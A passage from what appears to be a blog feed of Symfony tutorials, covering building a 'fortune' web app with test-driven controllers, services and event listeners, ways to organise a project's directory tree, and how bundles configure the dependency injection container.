use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
private $twig;
public function __construct(
ListAllFortunesHandler $listAllFortunesHandler,
\Twig_Environment $twig
) {
$this->listAllFortunesHandler = $listAllFortunesHandler;
$this->twig = $twig;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
$html = $this->twig->render('::list-all-fortunes.html.twig', array(
'fortunes' => $fortunes,
));
return new Response($html, 200);
}
}
Note: The first argument of
renderis the "path" to the view. This path contains 3 parts, separated by colons (:):
- the first part is the bundle name (by default it's
AppBundleso we don't need to provide it)- the second one is the directory from
Resources/views(in our case it's at the root so we don't need to provide it)- the template file name
Some other path example:
FortuneBundle:Fortunes/List:all.html.twig, etc.The second argument is an array which associates Twig variable names to their values, in our case we're going to have access to a
fortunesvariable in our template, which is going to be the content of the$fortunesvariable from our controller.
In order to get Twig injected in our controller, we'll update it's service configuration:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
- '@twig'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Since we changed the configuration, we'll need to clear the cache:
rm -rf var/cache/prod
Finally we can visit again our page: http://localhost:2501/app.php/.
Let's run our test suite one last time:
rm -rf var/cache/test
vendor/bin/phpunit
Everything is still green!
To create a new page, we need to:
The page's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
Finally to display the result we need to create a template file and call a templating engine, such as Twig, from our controller.
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
In this article, we're going to put all this knowledge in practice by creating a "fortune" project with an endpoint that allows us to submit new fortunes.
In the next articles we'll also create for this application:
The first step is to create our project. For this example we'll use the Standard Edition:
composer create-project symfony/framework-standard-edition fortune
This will ask us some configuration questions (e.g. database credentials), allowing us to set up everything in one step.
Note: Nothing prevents us from adding new libraries (e.g. Assert), replacing the ones provided by default (e.g. replacing Doctrine with Pomm) or remove the ones we don't need (e.g. Swiftmailer if we don't need emailing).
To begin with a clean slate we'll need to remove some things:
cd fortune
echo '' >> app/config/routing.yml
rm -rf src/AppBundle/Controller/* tests/AppBundle/Controller/* app/Resources/views/*
Then we're going to install PHPUnit locally:
composer require --dev phpunit/phpunit:5.2 --ignore-platform-reqs
We're now ready to begin.
We'll first start by writing a functional test for our new endpoint:
<?php
// tests/AppBundle/Controller/Api/FortuneControllerTest.php
namespace Tests\AppBundle\Controller\Api;
use Symfony\Component\HttpFoundation\Request;
class FortuneControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
}
/**
* @test
*/
public function it_cannot_submit_fortunes_without_content()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
)));
$response = $this->app->handle($request);
self::assertSame(422, $response->getStatusCode(), $response->getContent());
}
/**
* @test
*/
public function it_cannot_submit_fortunes_with_non_string_content()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
'content' => 42,
)));
$response = $this->app->handle($request);
self::assertSame(422, $response->getStatusCode(), $response->getContent());
}
/**
* @test
*/
public function it_submits_new_fortunes()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
'content' => 'Hello',
)));
$response = $this->app->handle($request);
self::assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
With functional tests, we're only interested in making sure all components play
well together, so checking the response status code (201 is succesfully created,
422 is a validation error) is sufficient.
Note:
400 BAD REQUESTis only used if there's a syntax error in the Request (e.g. invalid JSON).
Let's run the tests:
vendor/bin/phpunit
They fail, with a 404 NOT FOUND response. That's because we don't have any
controllers, so let's fix that:
<?php
// src/AppBundle/Controller/Api/FortuneController.php
namespace AppBundle\Controller\Api;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
public function submit(Request $request)
{
return new Response('', 201);
}
}
Having a controller is no good without routing configuration:
# app/config/routing.yml
submit_new_fortunes_endpoint:
path: /api/v1/fortunes
defaults:
_controller: app.api.fortune_controller:submit
methods:
- POST
In this configuration, _controller is set to call the submit method of the
app.api.fortune_controller service. Here's how to define this service:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
Now let's try again our tests:
rm -rf var/cache/test
vendor/bin/phpunit
Note: We need to remove the cache to take into account the new configuration.
The last test (happy scenario) pass! We'll have to fix the first two ones (unhappy scenario) later.
We can now call directly our endpoint:
php -S localhost:2501 -t web &
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Nobody expects the spanish inquisition!"}'
killall -9 php
We should successfully get a 201 CREATED.
So now we have an endpoint that does nothing. Let's fix it by creating the logic. Our first step will be to write a unit test for a class that will do a basic validation of the input:
<?php
// tests/AppBundle/Service/SubmitNewFortuneTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\SubmitNewFortune;
class SubmitNewFortuneTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "Look, matey, I know a dead parrot when I see one, and I'm looking at one right now.";
/**
* @test
*/
public function it_has_a_content()
{
$submitNewFortune = new SubmitNewFortune(self::CONTENT);
self::assertSame(self::CONTENT, $submitNewFortune->content);
}
/**
* @test
*/
public function it_fails_if_the_content_is_missing()
{
$this->expectException(\DomainException::class);
new SubmitNewFortune(null);
}
/**
* @test
*/
public function it_fails_if_the_content_is_not_a_string()
{
$this->expectException(\DomainException::class);
new SubmitNewFortune(42);
}
}
Note: You need PHPUnit 5.2 to be able to use
expectException.
Our SubmitNewFortune will check that we submitted a stringy content. Let's run
the tests:
vendor/bin/phpunit
Note: If we had used phpspec to write our unit tests, it would have created an empty
SubmitNewFortuneclass for us. There's nothing wrong with using both PHPUnit and phpspec, (the first for functional tests and the second for unit tests).
The tests fail because the actual class doesn't exist yet. We need to write it:
<?php
// src/AppBundle/Service/SubmitNewFortune.php
namespace AppBundle\Service;
class SubmitNewFortune
{
public $content;
public function __construct($content)
{
if (null === $content) {
throw new \DomainException('Missing required "content" parameter', 422);
}
if (false === is_string($content)) {
throw new \DomainException('Invalid "content" parameter: it must be a string', 422);
}
$this->content = $content;
}
}
Let's run the tests again:
vendor/bin/phpunit
This time they pass.
Validating the input parameters isn't enough, we now need to execute some logic
to actually submit new quotes. This can be done in a class that handles SubmitNewFortune:
<?php
// tests/AppBundle/Service/SubmitNewFortuneHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\SaveNewFortune;
use AppBundle\Service\SubmitNewFortune;
use AppBundle\Service\SubmitNewFortuneHandler;
class SubmitNewFortuneHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "It's just a flesh wound.";
private $submitNewFortuneHandler;
private $saveNewFortune;
protected function setUp()
{
$this->saveNewFortune = $this->prophesize(SaveNewFortune::class);
$this->submitNewFortuneHandler = new SubmitNewFortuneHandler(
$this->saveNewFortune->reveal()
);
}
/**
* @test
*/
public function it_submits_new_fortunes()
{
$submitNewFortune = new SubmitNewFortune(self::CONTENT);
$this->saveNewFortune->save(array(
'content' => self::CONTENT
))->shouldBeCalled();
$this->submitNewFortuneHandler->handle($submitNewFortune);
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create SubmitNewFortuneHandler:
<?php
// src/AppBundle/Service/SubmitNewFortuneHandler.php
namespace AppBundle\Service;
class SubmitNewFortuneHandler
{
private $saveNewFortune;
public function __construct(SaveNewFortune $saveNewFortune)
{
$this->saveNewFortune = $saveNewFortune;
}
public function handle(SubmitNewFortune $submitNewFortune)
{
$newFortune = array(
'content' => $submitNewFortune->content,
);
$this->saveNewFortune->save($newFortune);
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create SaveNewFortune:
<?php
// src/AppBundle/Service/SaveNewFortune.php
namespace AppBundle\Service;
interface SaveNewFortune
{
public function save(array $newFortune);
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section:
SubmitNewFortune class that contains all input parameters
to submit a new fortune, and it validates themSubmitNewFortuneHandler class that uses parameters from
SubmitNewFortune to call services which will do the actual logicSaveNewFortune interface, its implementations will save new
fortunesWe're going to use Doctrine DBAL to actually save new fortunes in a database.
This can be done by creating an implementation of SaveNewFortune:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalSaveNewFortune.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\SaveNewFortune;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalSaveNewFortune implements SaveNewFortune
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function save(array $newFortune)
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->insert('fortune');
$queryBuilder->setValue('content', '?');
$queryBuilder->setParameter(0, $newFortune['content']);
$sql = $queryBuilder->getSql();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
}
}
This was the last class we needed to write. We can now use SubmitNewFortune
in our controller:
<?php
// src/AppBundle/Controller/Api/FortuneController.php
namespace AppBundle\Controller\Api;
use AppBundle\Service\SubmitNewFortune;
use AppBundle\Service\SubmitNewFortuneHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $submitNewFortuneHandler;
public function __construct(SubmitNewFortuneHandler $submitNewFortuneHandler)
{
$this->submitNewFortuneHandler = $submitNewFortuneHandler;
}
public function submit(Request $request)
{
$submitNewFortune = new SubmitNewFortune(
$request->request->get('content')
);
$this->submitNewFortuneHandler->handle($submitNewFortune);
return new Response('', 201);
}
}
Note: In the controller, we extract Request (input) parameters and put them in
SubmitNewFortunewhich is going to validate them. We then simply callSubmitNewFortuneHandlerto take care of the logic associated toSubmitNewFortune.
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
Let's run the tests:
rm -rf var/cache/test
vendor/bin/phpunit
They currently fail with 500 INTERNAL SERVER ERROR. To get an idea of what's
going on, we need to have a look at our logs:
grep CRITICAL var/logs/test.log | tail -n 1 # Get the last line containing "CRITICAL", which is often cause by 500
This is what we got:
[2016-03-24 19:31:32] request.CRITICAL: Uncaught PHP Exception DomainException: "Missing required "content" parameter" at /home/foobar/fortune/src/AppBundle/Service/SubmitNewFortune.php line 13 {"exception":"[object] (DomainException(code: 422): Missing required \"content\" parameter at /home/foobar/fortune/src/AppBundle/Service/SubmitNewFortune.php:13)"} []
It looks like we don't get any data in the request attribute from Request.
That's because PHP doesn't populate $_POST when we send JSON data. We can fix
it by creating an EventListener that will prepare the Request for us:
<?php
// src/AppBundle/EventListener/JsonRequestContentListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class JsonRequestContentListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmited = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmited || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));
}
$request->request->add($data ?: array());
}
}
Our listener needs to be registered in the Dependency Injection Container:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
This should fix our error:
rm -rf var/cache/test
vendor/bin/phpunit
grep CRITICAL var/logs/test.log | tail -n 1
We still get a 500, but this time for the following reason:
[2016-03-24 19:36:09] request.CRITICAL: Uncaught PHP Exception Doctrine\DBAL\Exception\ConnectionException: "An exception occured in driver: SQLSTATE[08006] [7] FATAL: database "fortune" does not exist" at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/AbstractPostgreSQLDriver.php line 85 {"exception":"[object] (Doctrine\\DBAL\\Exception\\ConnectionException(code: 0): An exception occured in driver: SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/AbstractPostgreSQLDriver.php:85, Doctrine\\DBAL\\Driver\\PDOException(code: 7): SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:47, PDOException(code: 7): SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:43)"} []
The database doesn't exist. It can be created with the following command, provided by Doctrine:
bin/console doctrine:database:create
Let's take this opportunity to also create the table:
bin/console doctrine:query:sql 'CREATE TABLE fortune (content TEXT);'
Let's re-run the tests:
vendor/bin/phpunit
Hooray! We can now submit new fortunes by calling our endpoint:
rm -rf var/cache/prod
php -S localhost:2501 -t web &
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"What... is the air-speed velocity of an unladen swallow?"}'
killall -9 php
We can see our fortunes in the database:
bin/console doctrine:query:sql 'SELECT * FROM fortune;'
We still have two failing tests though. That's because we don't catch our DomainExceptions.
This can be fixed in an EventListener:
<?php
// src/AppBundle/EventListener/ExceptionListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class ExceptionListener
{
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof \DomainException) {
return;
}
$event->setResponse(new Response(json_encode(array(
'error' => $exception->getMessage(),
)), $exception->getCode(), array('Content-Type' => 'application/json')));
}
}
It then needs to be registered as a service:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Finally we run the tests:
rm -rf var/cache/test
vendor/bin/phpunit
All green!
To create a new endpoint, we need to:
We might need to create some event listeners (to populate $request->request
when receiving JSON content, or to convert exceptions to responses).
The endpoint's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
You can find the code on Github: Fortune - API example
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Start by putting everything in AppBundle until we have a better
idea of what the project looks like and how to organize it.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles.
In this article, we're going to have a closer look at how to organise our applications directory tree.
Finally in the next articles we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Deciding how our project directory is organized is up to us, but for consistency and convenience we usually use "Editions" to bootstrap new projects:
composer create-project gnugat/symfony-empty-edition our-project
cd our-project
Note: Here we've decided to use the Symfony Empty Edition which follows the "add what you need" philosophy (it only contains the strict minimum).
If we're rather fond of the "solve 80% of use cases" philosophy we can go for Standard Edition which includes many tools commonly used to build full-stack websites.
To find more distributions, check the official website.
The directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ └── parameters.yml.dist
├── bin
│ └── console
├── composer.json
├── src
│ └── AppBundle
│ └── AppBundle.php
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Each folder in the root directory has a purpose:
app: configurationbin: scripts, binariessrc: our codevar: temporary filesweb: public directory exposed via the web server (app.php is the front controller)Note: Classes that wouldn't be used in production can be put outside of
src(e.g. tests could be put intests, fixtures infixtures, etc). They should be configured incomposer.jsonas follow:{ "autoload-dev": { "psr-4": { "Gnugat\\Toasty\\Fixtures\\": "fixtures", "Gnugat\\Toasty\\Tests\\": "tests" } } }This way, when running Composer's
installcommand in development we get our tests/fixtures classes autoloaded, and when running the same command with--no-devoption in production we don't.
Once we have an empty skeleton, we can start organizing our code by puting all
new classes in src/AppBundle, as advised by the official best practice.
Symfony specific classes can be put in the following directories:
src/AppBundle/Command, for Console Commandssrc/AppBundle/Controller for HttpKernel Controllerssrc/AppBundle/DependencyInjection, for CompilerPassInterface and ExtensionInterface implementationssrc/AppBundle/EventListener, for EventDispatcher ListenersOur project specific classes can be put the src/AppBundle/Service directory.
The number of classes in will grow overtime, at some point we'll have an itch to organize them in a better way: we can group them by entity.
Regarding configuration, we can organize it this way:
app/config/routings/, contains Router configurationapp/config/services/, contains Dependency Injection configurationThe directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ └── AppBundle
│ ├── AppBundle.php
│ ├── Command
│ ├── Controller
│ ├── DependencyInjection
│ │ └── CompilerPass
│ ├── EventListener
│ └── Service
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Starting by putting everything in AppBundle is fine until we have a better idea
of what the project looks like and how to organize it.
As suggested in the official best practice,
we can move our "business logic" (everything in src/AppBundle/Service) to a new
src/<vendor>/<project> directory.
Note: Replace
<vendor>by the organization/author (e.g.Gnugat) and<project>by the project name (e.g.Toasty).
The directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
By leaving Symfony related classes in src/AppBundle and our "business logic"
in src/<vendor>/<project>, it becomes easier to decouple from the framework.
Building on "decoupling from frameworks", we might also want to decouple from libraires. To do so our "business logic" classes should rely on interfaces, and their implementation would use libraries.
At this point we can get three different categories of classes:
Domain ones, classes that reflect our business logicComponent ones, classes that don't have a direct link to our project and could be reused as librariesBridge ones, classes that map our Domain to Component (or third party libraries)By organizing our directory tree with those categories, it could looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
│ ├── Bridge
│ ├── Component
│ └── Domain
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
The issue with the previous organization is that classes in Bridge are now away
from their interface. Wouldn't it better to keep related classes close?
Here's an alternative organization, where we move Bridge to be in Domain:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
│ ├── Component
│ └── Domain
│ └── Bridge
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Note:
Componentscould also need their own bridges. Also, a "Bundle" is a kind of bridge: it maps a library to Symfony.
There's a possibility that our application grows out of proportion and we decide it'd be better to split it into smaller applications.
For example if we have an application that creates resources through a backend
and then provides them through an API for other applications, we could split it
in two: backend (note that backend could also be split in two:
backend-api and backend-ui) and api.
The problem is that those two applications would share a lot of logic, so splitting them in different repositories could become cumbersome to maintain. A good indicator to know if they need to be in the same repository: when we create a new version, do we need to release them together?
In that case it might be worth keeping those two applications in the same repository, this practice being called "Monolithic Repository".
For our project, it would mean:
apps directory where we would put small symfony applications,
similar to the first directory tree we've seenpackages directory where we would put the previous content of src/<vendor>/<project>,
with each component in their own directory (to enable us to use them selectively in each apps)Here's an overview:
.
├── apps
│ └── <app>
│ ├── app
│ │ ├── AppKernel.php
│ │ ├── autoload.php
│ │ └── config
│ │ ├── config_dev.yml
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ ├── routings
│ │ └── services
│ ├── bin
│ │ └── console
│ ├── composer.json
│ ├── composer.lock
│ ├── src
│ │ └── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ ├── var
│ │ ├── cache
│ │ └── logs
│ └── web
│ ├── app.php
│ ├── favicon.ico
│ └── robots.txt
└── packages
└── <package>
├── composer.json
└── src
Note: More information about Monolithic Repository:
There are many ways to organize our application directory tree, and it's difficult to pick one when we don't have a clear idea on their impact or on what our project should look like.
The best way to tackle this is to first start small (everything in src/AppBundle),
and then move gradually files around. It's also important to make sure that change
is possible.
Here are some alternative ways of organizing the project directory tree:
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Configure services from a third party library in a Bundle.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
In this article, we're going to have a closer look at how HttpKernel enables reusable code.
Then in the next article we'll see the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
The HttpKernel component provides two implementations for HttpKernelInterface.
The first one, HttpKernel, relies on Event Dispatcher and Routing to execute
the appropriate controller for the given Request.
And the second one, Kernel, relies on Dependency Injection and HttpKernel:
<?php
namespace Symfony\Component\HttpKernel;
use Symfony\Component\HttpFoundation\Request;
class Kernel implements HttpKernelInterface
{
public function handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true)
{
if (false === $this->booted) {
$this->boot();
}
return $this->container->get('http_kernel')->handle($request, $type, $catch);
}
public function boot()
{
// Initializes the container
}
abstract public function registerBundles();
}
Note: For brevity's sake,
Kernelhas been heavily truncated.
Initialization of the container includes:
ContainerBuilderExtensionInterface implementations in the containerCompilerPassInterface implementations in the containerOnce the container is initialized, Kernel expects it to contain a http_kernel
service to which it will delegate the actual HTTP work.
A bundle is a package that contains ExtensionInterface and CompilerPassInterface
implementations, to configure a Dependency Injection container. It can be summed
up by this interface:
<?php
namespace Symfony\Component\HttpKernel\Bundle;
use Symfony\Component\DependencyInjection\ContainerBuilder;
interface BundleInterface
{
// Adds CompilerPassInterface implementations to the container
public function build(ContainerBuilder $container);
// Returs an ExtensionInterface implementation, which will be registered in the container
public function getContainerExtension();
}
Note: Once again, this interface has been truncated for brevity's sake.
Bundles are usually created for one of the following purposes:
Note: the last category is considered bad practice, as explained in the following, articles:
- composer require technical-debt-bundle.
- Use only infrastructural bundles in Symfony2, by Elnur Abdurrakhimov
- Should everything really be a bundle in Symfony2?
- Yes, you can have low coupling in a Symfony2 application
- Symfony2 without bundles, by Elnur Abdurrakhimov, by Daniel Ribeiro
- Symfony2 some things I dont like about bundles, by Matthias Noback
- Symfony2 console commands as services why, by Matthias Noback
- Naked bundles, slides by Matthias Noback
Bundles follow by convention the following directory tree:
.
├── Command
├── Controller
├── DependencyInjection
│ └── CompilerPass
├── EventListener
├── Resources
│ └── config
│ └── services
│ └── some_definitions.yml
├── Tests
└── VendorProjectBundle.php
Since HttpKernel component is a third party library, we're going to create a bundle to provide its classes as Dependency Injection services. This is also a good opportunity to have a look at how a Symfony application works behind the hood.
NanoFrameworkBundle's purpose is to provides a http_kernel service that can be
used by Kernel. First let's create a directory:
mkdir nano-framework-bundle
cd nano-framework-bundle
Then we can create an implementation of BundleInterface:
<?php
// VendorNanoFrameworkBundle.php
namespace Vendor\NanoFrameworkBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class VendorNanoFrameworkBundle extends Bundle
{
}
To be able to load Dependency Injection configuration, we'll create an
implementation of ExtensionInterface:
<?php
// DependencyInjection/VendorNanoFrameworkExtension.php
namespace Vendor\NanoFrameworkBundle\DependencyInjection;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
class VendorNanoFrameworkExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__.'/../Resources/config');
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('services/');
}
}
Once done, we can create the configuration:
# Resources/config/services/http_kernel.yml
services:
http_kernel:
class: Symfony\Component\HttpKernel\HttpKernel
arguments:
- "@event_dispatcher"
- "@controller_resolver"
- "@request_stack"
event_dispatcher:
class: Symfony\Component\EventDispatcher\EventDispatcher
controller_resolver:
class: Symfony\Component\HttpKernel\Controller\ControllerResolver
public: false
request_stack:
class: Symfony\Component\HttpFoundation\RequestStack
In order to register event listeners in EventDispatcher in a way that doesn't
require us to edit Resources/config/services/http_kernel.yml, we're going to
create an implementation of CompilerInterface:
<?php
// DependencyInjection/CompilerPass/AddListenersPass.php
namespace Vendor\NanoFrameworkBundle\DependencyInjection;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\Reference;
class AddListenersPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container)
{
$eventDispatcher = $container->findDefinition('event_dispatcher');
$eventListeners = $container->findTaggedServiceIds('kernel.event_listener');
foreach ($eventListeners as $id => $events) {
foreach ($events as $event) {
$eventDispatcher->addMethodCall('addListener', array(
$event['event'],
array(new Reference($id), $event['method']),
isset($event['priority']) ? $event['priority'] : 0;
));
}
}
}
}
With this, we only need to add a tag with:
